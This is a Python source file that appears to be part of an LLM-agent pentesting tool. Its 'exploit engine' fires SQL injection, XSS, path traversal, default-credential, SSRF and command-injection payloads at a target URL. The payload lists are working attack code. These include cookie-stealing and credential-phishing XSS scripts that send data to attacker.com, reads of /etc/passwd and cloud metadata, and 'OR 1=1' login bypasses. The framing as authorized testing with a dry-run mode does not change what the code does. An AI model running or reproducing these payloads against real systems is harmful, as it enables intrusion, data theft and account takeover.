Spaces:
Running
Running
| """ | |
| agents/exploit_engine.py β Part 3: Exploitation Attempt Engine | |
| Accepts Part 2 vuln dict and confirms vulnerabilities with safe PoC exploits. | |
| Run standalone: python -m agents.exploit_engine --vulns reports/vulns/vulns_*.json | |
| Or via main.py: python main.py --target example.com --parts 1,2,3 | |
| """ | |
| import re | |
| import json | |
| import time | |
| import socket | |
| import argparse | |
| import urllib.parse | |
| from dataclasses import asdict | |
| from typing import Optional | |
| import requests | |
| from bs4 import BeautifulSoup | |
| from rich.panel import Panel | |
| from rich.table import Table | |
| from langchain_groq import ChatGroq | |
| from langchain_openai import ChatOpenAI | |
| from langchain.agents import AgentExecutor, create_tool_calling_agent | |
| from langchain_core.prompts import ChatPromptTemplate | |
| from langchain_core.tools import tool | |
| from core.models import ExploitResult, ExploitSession, make_id | |
| from core.utils import console, safe_get, safe_post, save_json, save_markdown | |
| from core.config import (GROQ_API_KEY, GROQ_MODEL_DEFAULT, GROQ_MODELS, | |
| GEMINI_API_KEY, GEMINI_MODEL_DEFAULT, | |
| EXPLOIT_DIR, MAX_EXPLOIT_ATTEMPTS, LLM_PROVIDER) | |
| # ββ Global state βββββββββββββββββββββββββββββββββββββββββ | |
| session: ExploitSession = None | |
| DRY_RUN: bool = False | |
| def _add(r: ExploitResult): | |
| session.add_result(r) | |
| color = {"CONFIRMED":"bold red","FAILED":"dim","SKIPPED":"yellow","ERROR":"orange3"}.get(r.status,"white") | |
| console.print(f" [{color}]{r.status:10}[/{color}] {r.vuln_category:15} {r.vuln_title[:55]}") | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| # MODULE 1 β SQLI DATA EXTRACTION | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| SQLI_EXTRACT = [ | |
| ("MySQL version", "' UNION SELECT version(),NULL,NULL--", r"(\d+\.\d+\.\d+[^\s]*)"), | |
| ("MySQL db name", "' UNION SELECT database(),NULL,NULL--", r"([a-zA-Z0-9_]{3,30})"), | |
| ("MySQL tables", "' UNION SELECT table_name,NULL,NULL FROM information_schema.tables WHERE table_schema=database() LIMIT 5--", r"([a-z_]{3,20})"), | |
| ("PostgreSQL ver", "' UNION SELECT version(),NULL,NULL--", r"(PostgreSQL\s[\d.]+)"), | |
| ("MSSQL version", "' UNION SELECT @@version,NULL,NULL--", r"(Microsoft SQL Server\s[\d]+)"), | |
| ("DB error reveal", "'", r"(sql syntax|ORA-|pg_query|unclosed quotation)"), | |
| ] | |
| DB_ERR = re.compile(r"(sql syntax|mysql_fetch|ORA-\d{5}|pg_query|unclosed quotation|" | |
| r"Warning.*mysql|SQLSTATE|Microsoft OLE DB|Invalid query)", re.IGNORECASE) | |
| def sqli_extract(url: str, vulnerable_param: str) -> str: | |
| """ | |
| Confirm SQLi by extracting DB version and table names via safe UNION SELECT. | |
| Never modifies data β SELECT only. | |
| """ | |
| console.print(f"\n[cyan]β SQLi extract:[/cyan] {url} param={vulnerable_param}") | |
| parsed = urllib.parse.urlparse(url) | |
| base = urllib.parse.parse_qs(parsed.query) | |
| if DRY_RUN: | |
| _add(ExploitResult(exploit_id=make_id("sqli_dryrun",url), vuln_title="SQLi extract (dry run)", | |
| vuln_category="SQLi", target_url=url, status="SKIPPED", | |
| technique="UNION SELECT version(),database()", request_sent=f"[dry-run]", | |
| response_snippet="No request sent", impact="DB version, table names, potential full dump.", | |
| cvss_score=9.8, severity="CRITICAL", evidence_type="dry_run")) | |
| return json.dumps({"status":"dry_run"}) | |
| for label, payload, pattern in SQLI_EXTRACT: | |
| p = dict(base); p[vulnerable_param] = [payload] | |
| test_url = urllib.parse.urlunparse(parsed._replace(query=urllib.parse.urlencode(p,doseq=True))) | |
| r = safe_get(test_url) | |
| if not r: continue | |
| err = DB_ERR.search(r.text) | |
| match = re.search(pattern, r.text, re.IGNORECASE) | |
| if match or err: | |
| extracted = (match or err).group(1) | |
| _add(ExploitResult(exploit_id=make_id(label,url), vuln_title=f"SQLi confirmed: {label}", | |
| vuln_category="SQLi", target_url=test_url, status="CONFIRMED", | |
| technique=f"UNION SELECT in param '{vulnerable_param}'", | |
| request_sent=f"GET {test_url[:120]}", | |
| response_snippet=f"Extracted: {extracted[:100]}", | |
| impact="Full DB enumeration possible β tables, columns, row data, credentials.", | |
| cvss_score=9.8, severity="CRITICAL", | |
| evidence_type="data_leak" if match else "error_message", | |
| notes=f"Payload: {payload}")) | |
| return json.dumps({"confirmed":True, "label":label, "extracted":extracted}, indent=2) | |
| return json.dumps({"confirmed":False}) | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| # MODULE 2 β XSS POC | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| XSS_POC = [ | |
| ('<script>alert("XSS-POC")</script>', r'alert.*XSS-POC'), | |
| ('<img src=x onerror=alert("XSS-POC")>', r'onerror=alert'), | |
| ('<svg onload=alert("XSS-POC")>', r'onload=alert'), | |
| ] | |
| ATTACK_SCENARIOS = { | |
| "cookie_theft": '<script>new Image().src="https://attacker.com/?c="+document.cookie</script>', | |
| "session_hijack": '<script>fetch("https://attacker.com/",{method:"POST",body:document.cookie})</script>', | |
| "phishing_overlay":'<script>document.body.innerHTML="<form action=https://attacker.com method=POST><input name=u><input type=password name=p><button>Login</button></form>"</script>', | |
| } | |
| def xss_exploit_poc(url: str, vulnerable_param: str, param_type: str = "query") -> str: | |
| """ | |
| Build a working XSS PoC and document cookie theft / session hijack scenarios. | |
| Confirms reflection only β does NOT steal cookies. | |
| """ | |
| console.print(f"\n[cyan]β XSS PoC:[/cyan] {url} param={vulnerable_param}") | |
| if DRY_RUN: | |
| _add(ExploitResult(exploit_id=make_id("xss_dryrun",url), vuln_title="XSS PoC (dry run)", | |
| vuln_category="XSS", target_url=url, status="SKIPPED", | |
| technique="Reflected XSS payload", request_sent="[dry-run]", | |
| response_snippet="No request sent", | |
| impact="Cookie theft, session hijack, phishing overlay, keylogging.", | |
| cvss_score=7.4, severity="HIGH", evidence_type="dry_run")) | |
| return json.dumps({"status":"dry_run"}) | |
| parsed = urllib.parse.urlparse(url) | |
| base = urllib.parse.parse_qs(parsed.query) | |
| for payload, pattern in XSS_POC: | |
| if param_type == "query": | |
| p = dict(base); p[vulnerable_param] = [payload] | |
| test_url = urllib.parse.urlunparse(parsed._replace(query=urllib.parse.urlencode(p,doseq=True))) | |
| r = safe_get(test_url) | |
| else: | |
| test_url = url | |
| r = safe_post(url, {vulnerable_param: payload}) | |
| if not r: continue | |
| if payload in r.text and "<script>" not in r.text: | |
| _add(ExploitResult(exploit_id=make_id("xss_confirmed",url), | |
| vuln_title=f"XSS confirmed β {vulnerable_param}", | |
| vuln_category="XSS", target_url=test_url, status="CONFIRMED", | |
| technique=f"Reflected XSS via '{vulnerable_param}'", | |
| request_sent=f"GET {test_url[:120]}", | |
| response_snippet=f"Payload reflected: {payload[:80]}", | |
| impact="Cookie theft, session hijack, phishing overlay, keylogging.", | |
| cvss_score=7.4, severity="HIGH", evidence_type="reflection", | |
| notes=f"Attack scenarios: {list(ATTACK_SCENARIOS.keys())}")) | |
| return json.dumps({"confirmed":True, "payload":payload, | |
| "attack_scenarios": ATTACK_SCENARIOS}, indent=2) | |
| _add(ExploitResult(exploit_id=make_id("xss_failed",url), vuln_title=f"XSS re-test β {vulnerable_param}", | |
| vuln_category="XSS", target_url=url, status="FAILED", technique="XSS PoC", | |
| request_sent=f"{len(XSS_POC)} payloads", response_snippet="No reflection", | |
| impact="Not confirmed", cvss_score=0.0, severity="INFO", evidence_type="none")) | |
| return json.dumps({"confirmed":False}) | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| # MODULE 3 β PATH TRAVERSAL / LFI | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| LFI_PAYLOADS = [ | |
| ("../../../etc/passwd", r"root:.*:/bin/(bash|sh)"), | |
| ("....//....//....//etc/passwd", r"root:.*:/bin/(bash|sh)"), | |
| ("%2e%2e%2f%2e%2e%2fetc%2fpasswd", r"root:.*:/bin/(bash|sh)"), | |
| # FIXED: Hostname files should contain actual hostnames, not generic patterns | |
| # Linux hostnames are typically lowercase alphanumeric with optional hyphens/dots | |
| ("../../../etc/hostname", r"^[a-z][a-z0-9\-]{2,63}$"), | |
| ("../../../proc/version", r"Linux version \d+"), | |
| ("..\\..\\..\\windows\\win.ini", r"\[fonts\]"), | |
| ] | |
| def path_traversal_probe(url: str, file_param: str = "file") -> str: | |
| """ | |
| Test for LFI/path traversal β reads /etc/passwd and /etc/hostname only. | |
| Never reads sensitive app config. | |
| """ | |
| console.print(f"\n[cyan]β Path traversal:[/cyan] {url} param={file_param}") | |
| if DRY_RUN: | |
| _add(ExploitResult(exploit_id=make_id("lfi_dryrun",url), vuln_title="LFI probe (dry run)", | |
| vuln_category="PathTraversal", target_url=url, status="SKIPPED", | |
| technique="Traversal sequences", request_sent="[dry-run]", | |
| response_snippet="No request sent", | |
| impact="Read any file accessible to web server process.", | |
| cvss_score=8.6, severity="HIGH", evidence_type="dry_run")) | |
| return json.dumps({"status":"dry_run"}) | |
| parsed = urllib.parse.urlparse(url) | |
| base = urllib.parse.parse_qs(parsed.query) | |
| for payload, pattern in LFI_PAYLOADS: | |
| p = dict(base); p[file_param] = [payload] | |
| test_url = urllib.parse.urlunparse(parsed._replace(query=urllib.parse.urlencode(p,doseq=True))) | |
| r = safe_get(test_url) | |
| if not r: continue | |
| match = re.search(pattern, r.text, re.IGNORECASE) | |
| if match: | |
| evidence = match.group(0)[:120] | |
| # CRITICAL FIX: Validate evidence is NOT from normal HTML responses | |
| # Reject if evidence looks like HTML/DOCTYPE/common web strings | |
| false_positive_indicators = [ | |
| 'doctype', '<!doctype', '<html', '<head', '<body', '<meta', | |
| '<script', '<style', '<div', '<span', 'charset=', 'content=', | |
| 'http-equiv', 'viewport', 'stylesheet', 'javascript', | |
| # Common English words that aren't hostnames | |
| 'the ', 'and ', 'for ', 'this ', 'that ', 'with ', | |
| ] | |
| is_false_positive = any( | |
| indicator.lower() in evidence.lower() | |
| for indicator in false_positive_indicators | |
| ) | |
| # For hostname payloads, validate it looks like an actual hostname | |
| if 'hostname' in payload.lower(): | |
| # Hostnames should be short, lowercase, no spaces/HTML | |
| hostname_valid = ( | |
| len(evidence) < 64 and | |
| evidence.isalnum() or '-' in evidence and | |
| not any(c.isupper() for c in evidence.replace('-', '')) and | |
| ' ' not in evidence and | |
| '<' not in evidence | |
| ) | |
| if not hostname_valid: | |
| is_false_positive = True | |
| if is_false_positive: | |
| console.print(f" [dim]β False positive filtered: {evidence[:60]}[/dim]") | |
| continue | |
| _add(ExploitResult(exploit_id=make_id("lfi_confirmed",url), | |
| vuln_title=f"Path traversal confirmed β reads {payload.split('/')[-1]}", | |
| vuln_category="PathTraversal", target_url=test_url, status="CONFIRMED", | |
| technique=f"Traversal in '{file_param}': {payload}", | |
| request_sent=f"GET {test_url[:140]}", | |
| response_snippet=evidence, | |
| impact="Read /etc/shadow, SSH keys, app config, DB credentials, source code.", | |
| cvss_score=8.6, severity="HIGH", evidence_type="data_leak", | |
| notes=f"Payload: {payload}")) | |
| return json.dumps({"confirmed":True, "payload":payload, | |
| "evidence":evidence[:80]}, indent=2) | |
| return json.dumps({"confirmed":False}) | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| # MODULE 4 β AUTH BYPASS | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| DEFAULT_CREDS = [ | |
| ("admin","admin"),("admin","password"),("admin","123456"),("admin",""), | |
| ("administrator","administrator"),("root","root"),("guest","guest"),("admin","changeme"), | |
| ] | |
| SQL_BYPASS = [("' OR '1'='1'--","' OR '1'='1'--"),("' OR 1=1--","anything")] | |
| ADMIN_PATHS = ["/admin/login","/admin","/wp-admin","/wp-login.php","/login", | |
| "/administrator","/cpanel","/phpmyadmin","/console"] | |
| def auth_bypass_test(base_url: str, custom_login_path: str = "") -> str: | |
| """ | |
| Test admin panels for default credentials and SQL auth bypass. | |
| Stops after first confirmed login β never creates accounts. | |
| """ | |
| console.print(f"\n[cyan]β Auth bypass:[/cyan] {base_url}") | |
| if DRY_RUN: | |
| _add(ExploitResult(exploit_id=make_id("auth_dryrun",base_url), | |
| vuln_title="Auth bypass (dry run)", vuln_category="AuthBypass", | |
| target_url=base_url, status="SKIPPED", technique="Default creds + SQL bypass", | |
| request_sent="[dry-run]", response_snippet="No request sent", | |
| impact="Full admin panel access.", cvss_score=9.8, severity="CRITICAL", | |
| evidence_type="dry_run")) | |
| return json.dumps({"status":"dry_run"}) | |
| import urllib3; urllib3.disable_warnings() | |
| sess = requests.Session(); sess.verify = False | |
| sess.headers["User-Agent"] = "Mozilla/5.0" | |
| paths = [custom_login_path] if custom_login_path else ADMIN_PATHS | |
| for path in paths: | |
| login_url = base_url.rstrip("/") + path | |
| r = safe_get(login_url) | |
| if not r or r.status_code not in (200,301,302): continue | |
| soup = BeautifulSoup(r.text, "html.parser") | |
| form = soup.find("form") | |
| if not form: continue | |
| inputs = {i.get("name",""): i.get("value","") for i in form.find_all("input") if i.get("name")} | |
| user_field = next((k for k in inputs if any(x in k.lower() for x in ["user","login","email"])), None) | |
| pass_field = next((k for k in inputs if any(x in k.lower() for x in ["pass","pwd"])), None) | |
| if not user_field or not pass_field: continue | |
| action = form.get("action", path) | |
| post_url = base_url.rstrip("/")+action if not action.startswith("http") else action | |
| for username, password in DEFAULT_CREDS: | |
| data = dict(inputs); data[user_field]=username; data[pass_field]=password | |
| time.sleep(0.3) | |
| try: | |
| resp = sess.post(post_url, data=data, timeout=10, allow_redirects=True) | |
| body = resp.text.lower() | |
| if (any(s in body for s in ["logout","dashboard","welcome","sign out"]) | |
| and not any(f in body for f in ["invalid","incorrect","failed"])): | |
| _add(ExploitResult(exploit_id=make_id("auth_confirmed",login_url), | |
| vuln_title=f"Default credentials: {username}:{password}", | |
| vuln_category="AuthBypass", target_url=post_url, status="CONFIRMED", | |
| technique=f"Default cred: {username}/{'*'*len(password) or '(empty)'}", | |
| request_sent=f"POST {post_url} [{user_field}={username}]", | |
| response_snippet=resp.text[:200], | |
| impact=f"Full admin access. Read/modify all data, possible RCE via file upload.", | |
| cvss_score=9.8, severity="CRITICAL", evidence_type="auth_success", | |
| notes=f"Login path: {path}")) | |
| return json.dumps({"confirmed":True,"credentials":{"user":username,"pass":password}}) | |
| except Exception: pass | |
| for user_pl, pass_pl in SQL_BYPASS: | |
| data = dict(inputs); data[user_field]=user_pl; data[pass_field]=pass_pl | |
| time.sleep(0.3) | |
| try: | |
| resp = sess.post(post_url, data=data, timeout=10, allow_redirects=True) | |
| body = resp.text.lower() | |
| if (any(s in body for s in ["logout","dashboard","welcome"]) | |
| and not any(f in body for f in ["invalid","incorrect"])): | |
| _add(ExploitResult(exploit_id=make_id("sql_auth_bypass",login_url), | |
| vuln_title="SQL auth bypass confirmed", | |
| vuln_category="AuthBypass", target_url=post_url, status="CONFIRMED", | |
| technique=f"SQL injection in login: {user_pl}", | |
| request_sent=f"POST {post_url}", | |
| response_snippet=resp.text[:200], | |
| impact="Auth bypassed via SQLi. Full admin access.", | |
| cvss_score=9.8, severity="CRITICAL", evidence_type="auth_success")) | |
| return json.dumps({"confirmed":True,"technique":"sql_auth_bypass"}) | |
| except Exception: pass | |
| return json.dumps({"confirmed":False}) | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| # MODULE 5 β SSRF PROBE | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| SSRF_PARAMS = ["url","redirect","next","image","src","load","fetch","request","uri","resource","link"] | |
| CLOUD_META = ["http://169.254.169.254/latest/meta-data/", | |
| "http://metadata.google.internal/computeMetadata/v1/"] | |
| def ssrf_probe(base_url: str, known_params: str = "") -> str: | |
| """Detect SSRF β makes server fetch external/cloud-metadata URLs.""" | |
| console.print(f"\n[cyan]β SSRF probe:[/cyan] {base_url}") | |
| if DRY_RUN: | |
| _add(ExploitResult(exploit_id=make_id("ssrf_dryrun",base_url), | |
| vuln_title="SSRF probe (dry run)", vuln_category="SSRF", | |
| target_url=base_url, status="SKIPPED", | |
| technique="URL injection in query params", request_sent="[dry-run]", | |
| response_snippet="No request sent", | |
| impact="Internal network access, cloud credential leak.", | |
| cvss_score=8.3, severity="HIGH", evidence_type="dry_run")) | |
| return json.dumps({"status":"dry_run"}) | |
| params = known_params.split(",") if known_params else SSRF_PARAMS | |
| for param in params[:8]: | |
| for callback in CLOUD_META: | |
| test_url = f"{base_url}{'&' if '?' in base_url else '?'}{param}={urllib.parse.quote(callback)}" | |
| r = safe_get(test_url, timeout=6) | |
| if not r: continue | |
| if re.search(r"(ami-id|instance-id|iam/security-credentials|computeMetadata)", r.text, re.I): | |
| _add(ExploitResult(exploit_id=make_id("ssrf_confirmed",base_url), | |
| vuln_title=f"SSRF β cloud metadata via '{param}'", | |
| vuln_category="SSRF", target_url=test_url, status="CONFIRMED", | |
| technique=f"SSRF via '{param}' β {callback}", | |
| request_sent=f"GET {test_url[:140]}", | |
| response_snippet=r.text[:200], | |
| impact="IAM credentials, instance metadata, internal service tokens exposed.", | |
| cvss_score=8.3, severity="HIGH", evidence_type="data_leak", | |
| notes="Cloud metadata pattern found")) | |
| return json.dumps({"confirmed":True,"param":param,"callback":callback}) | |
| return json.dumps({"confirmed":False, "params_tested": params[:8]}) | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| # MODULE 6 β COMMAND INJECTION | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| CMDI_PAYLOADS = [ | |
| ("; whoami", r"(root|www-data|apache|nginx|nobody|daemon)"), | |
| ("| whoami", r"(root|www-data|apache|nginx|nobody|daemon)"), | |
| ("$(whoami)", r"(root|www-data|apache|nginx|nobody|daemon)"), | |
| ("; id", r"uid=\d+"), | |
| ("; hostname", r"[a-zA-Z0-9\-]{3,50}"), | |
| ("; sleep 3", None), | |
| ("& whoami", r"[a-zA-Z0-9\\]+(\\[a-zA-Z0-9]+)?"), | |
| ] | |
| def cmdi_probe(url: str, vulnerable_param: Optional[str] = None) -> str: | |
| """ | |
| Detect OS command injection via output reflection or timing. | |
| Only tests safe read-only commands: whoami, id, hostname, sleep. | |
| """ | |
| console.print(f"\n[cyan]β Cmd injection:[/cyan] {url}") | |
| if DRY_RUN: | |
| _add(ExploitResult(exploit_id=make_id("cmdi_dryrun",url), | |
| vuln_title="Cmd injection probe (dry run)", vuln_category="CmdInjection", | |
| target_url=url, status="SKIPPED", technique="; whoami / sleep timing", | |
| request_sent="[dry-run]", response_snippet="No request sent", | |
| impact="Remote code execution as web server user.", | |
| cvss_score=9.8, severity="CRITICAL", evidence_type="dry_run")) | |
| return json.dumps({"status":"dry_run"}) | |
| parsed = urllib.parse.urlparse(url) | |
| query = urllib.parse.parse_qs(parsed.query) | |
| params = [vulnerable_param] if vulnerable_param else list(query.keys())[:5] | |
| for param in params: | |
| for payload, pattern in CMDI_PAYLOADS: | |
| p = dict(query); p[param] = [(p.get(param,["1"])[0]) + payload] | |
| test_url = urllib.parse.urlunparse(parsed._replace(query=urllib.parse.urlencode(p,doseq=True))) | |
| start = time.time() | |
| r = safe_get(test_url) | |
| elapsed = time.time() - start | |
| if not r: continue | |
| if pattern: | |
| match = re.search(pattern, r.text) | |
| if match: | |
| _add(ExploitResult(exploit_id=make_id("cmdi_confirmed",url), | |
| vuln_title=f"Cmd injection β {param} (output-based)", | |
| vuln_category="CmdInjection", target_url=test_url, status="CONFIRMED", | |
| technique=f"Injected `{payload}` into '{param}'", | |
| request_sent=f"GET {test_url[:140]}", | |
| response_snippet=f"Output: {match.group(0)[:80]}", | |
| impact=f"RCE as {match.group(0)}. File read, reverse shell, pivot possible.", | |
| cvss_score=9.8, severity="CRITICAL", evidence_type="data_leak", | |
| notes=f"Server user: {match.group(0)}")) | |
| return json.dumps({"confirmed":True,"type":"output","server_user":match.group(0)}) | |
| if "sleep" in payload and elapsed >= 2.5: | |
| _add(ExploitResult(exploit_id=make_id("cmdi_timebased",url), | |
| vuln_title=f"Cmd injection β {param} (time-based)", | |
| vuln_category="CmdInjection", target_url=test_url, status="CONFIRMED", | |
| technique=f"Time-based: `{payload}` in '{param}'", | |
| request_sent=f"GET {test_url[:140]}", | |
| response_snippet=f"Delay: {elapsed:.2f}s", | |
| impact="Blind RCE. Out-of-band exfil, reverse shell, persistence.", | |
| cvss_score=9.8, severity="CRITICAL", evidence_type="delay", | |
| notes=f"Delay: {elapsed:.2f}s")) | |
| return json.dumps({"confirmed":True,"type":"time_based","delay":round(elapsed,2)}) | |
| return json.dumps({"confirmed":False}) | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| # AGENT | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| SYSTEM_PROMPT = """You are an expert penetration tester in the exploitation phase. | |
| β οΈ Authorized targets only. Confirm vulns β never destroy data or install backdoors. | |
| RULES: | |
| - Run sqli_extract for each confirmed SQLi finding | |
| - Run xss_exploit_poc for each confirmed XSS finding | |
| - Run auth_bypass_test if admin paths found | |
| - Run ssrf_probe if URL/redirect params exist | |
| - Run cmdi_probe if OS command injection is suspected | |
| - Max {max_attempts} exploit attempts total | |
| - Explain your reasoning before each tool call | |
| """.format(max_attempts=MAX_EXPLOIT_ATTEMPTS) | |
| def build_agent(llm: ChatGroq) -> AgentExecutor: | |
| tools = [sqli_extract, xss_exploit_poc, path_traversal_probe, | |
| auth_bypass_test, ssrf_probe, cmdi_probe] | |
| prompt = ChatPromptTemplate.from_messages([ | |
| ("system", SYSTEM_PROMPT), | |
| ("human", "{input}"), | |
| ("placeholder", "{agent_scratchpad}"), | |
| ]) | |
| agent = create_tool_calling_agent(llm, tools, prompt) | |
| return AgentExecutor(agent=agent, tools=tools, verbose=True, max_iterations=15) | |
| def build_task(target: str, vulns: list, severity_filter: list, dry_run: bool) -> str: | |
| filtered = sorted( | |
| [v for v in vulns if v.get("severity","INFO") in severity_filter], | |
| key=lambda x: -x.get("cvss_score",0) | |
| )[:20] | |
| return ( | |
| f"Target: {target}\n" | |
| f"Dry-run: {dry_run}\n\n" | |
| f"Vulnerability findings from Part 2:\n" | |
| f"{json.dumps(filtered, indent=2)}\n\n" | |
| "Prioritise by CVSS score. Explain each exploit attempt before running it." | |
| ) | |
| def run(vuln_data: dict, model: str = GROQ_MODEL_DEFAULT, | |
| severity_filter: list = None, dry_run: bool = False) -> dict: | |
| """ | |
| Entry point called by main.py. | |
| Accepts Part 2 vuln dict, returns exploit session dict. | |
| """ | |
| global session, DRY_RUN | |
| DRY_RUN = dry_run | |
| if severity_filter is None: | |
| severity_filter = ["CRITICAL", "HIGH"] | |
| target = vuln_data.get("target", "unknown") | |
| vulns = vuln_data.get("vulnerabilities", []) | |
| session = ExploitSession(target=target, dry_run=dry_run) | |
| # Initialize LLM based on configured provider | |
| if LLM_PROVIDER == "gemini": | |
| llm = ChatOpenAI( | |
| api_key=GEMINI_API_KEY or "dummy_key", | |
| base_url="https://generativelanguage.googleapis.com/v1beta/openai/", | |
| model=GEMINI_MODEL_DEFAULT, | |
| temperature=0 | |
| ) | |
| console.print(f"[dim]Using LLM: Gemini ({GEMINI_MODEL_DEFAULT}) - Fallback mode (OpenAI-mode)[/dim]") | |
| else: | |
| llm = ChatGroq(model=model, api_key=GROQ_API_KEY, | |
| temperature=0, max_tokens=4096) | |
| console.print(f"[dim]Using LLM: Groq ({model})[/dim]") | |
| console.print(f"\n[bold]Part 3 β Exploit engine:[/bold] {target} dry_run={dry_run}") | |
| build_agent(llm).invoke({"input": build_task(target, vulns, severity_filter, dry_run)}) | |
| session.session_end = __import__("datetime").datetime.utcnow().isoformat() | |
| result_dict = { | |
| "target": target, | |
| "session_start": session.session_start, | |
| "session_end": session.session_end, | |
| "dry_run": dry_run, | |
| "summary": session.summary(), | |
| "confirmed_count": len(session.confirmed()), | |
| "results": [asdict(r) for r in session.results], | |
| } | |
| json_path = save_json(result_dict, EXPLOIT_DIR, "exploits", target) | |
| console.print(f"[green]β[/green] Exploit JSON: {json_path}") | |
| confirmed = session.confirmed() | |
| if confirmed: | |
| console.print(f"\n[bold red]{len(confirmed)} vulnerability/vulnerabilities confirmed exploitable:[/bold red]") | |
| for r in confirmed: | |
| console.print(f" [red]β’[/red] {r.vuln_title}") | |
| return result_dict | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| # STANDALONE ENTRY | |
| # ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ | |
| if __name__ == "__main__": | |
| from core.utils import load_json | |
| parser = argparse.ArgumentParser(description="Part 3 β Exploit engine") | |
| parser.add_argument("--vulns", required=True, help="Part 2 vuln JSON") | |
| parser.add_argument("--model", default=GROQ_MODEL_DEFAULT, choices=list(GROQ_MODELS.keys())) | |
| parser.add_argument("--severity", default="CRITICAL,HIGH") | |
| parser.add_argument("--dry-run", action="store_true") | |
| parser.add_argument("--delay", type=float, default=0.3) | |
| args = parser.parse_args() | |
| from core.utils import set_delay | |
| set_delay(args.delay) | |
| run(load_json(args.vulns), args.model, | |
| [s.strip().upper() for s in args.severity.split(",")], args.dry_run) | |